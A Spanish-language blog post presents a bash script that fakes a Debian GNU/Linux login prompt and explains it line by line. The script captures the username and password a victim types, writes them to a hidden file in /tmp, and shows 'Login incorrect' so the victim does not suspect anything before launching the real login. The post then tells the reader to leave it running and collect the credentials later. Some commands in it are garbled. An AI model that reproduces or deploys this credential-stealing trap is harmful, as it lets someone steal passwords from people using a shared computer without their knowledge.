Banner 1

Falso Login en Linux Debian Sarge

falso_login #Abro editor de texto vi con el nombre de archivo falso_login.sh

clear
#Limpio pantalla

echo "Debian GNU/Linux 4.0 debian `tty cut -c6,7,8,9`" #Pantalla de inicio de Debian 4.0 ustedes pongan la que tienen

echo
echo -n "`uname -n` login: " #Imprimo nombre de host, seguido de la palabra login

read usu #Guardo en la variable usu el nombre de usuario capturado de teclado

stty -echonl -echo #Evita que se lea todo lo que se tipea, obviamente para no leer el password que se escribe

echo -n "Password: "

read pass #Escbribo la palabra password para que aparezca en pantalla y que el usuario la teclee

echos

leep 3

echo >> /tmp/.captura

echo "Usuario: $usu" >> /tmp/.captura #Envio el nombre de usuario capturado al archivo .pass ubicado en /tmp

echo "Contraseña: $pass" >> /tmp/.captura #Envio la password del usuario al mismo archivo que la linea anterior

echo >> /tmp/.captura

echo

echo "Login incorrect" #Muestro por pantalla login incorrecto para que el user no sospeche

echo

exec /bin/login #Ejecuto el verdadero login

Guardo el archivo con [ESC]: -> wq

Cambio permisos para que pueda ejecutarse:#chmod a+x falso_login.sh

Dejamos ejecutando esperando que algun usuario ingrese su login y su pass y listo
./falso_login.sh

Luego una vez que el usuario dejo la pc, volvemos a dicha maquina y vemos lo siguiente:
cat /tmp/.captura

Y veremos como resultado los usuarios y password que ingresaron
cat /tmp/.captura

Fuente: http://redes-seguridad.blogspot.com/2007/04/htcat-wq-cambio-permisos-para-que-pueda.html

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay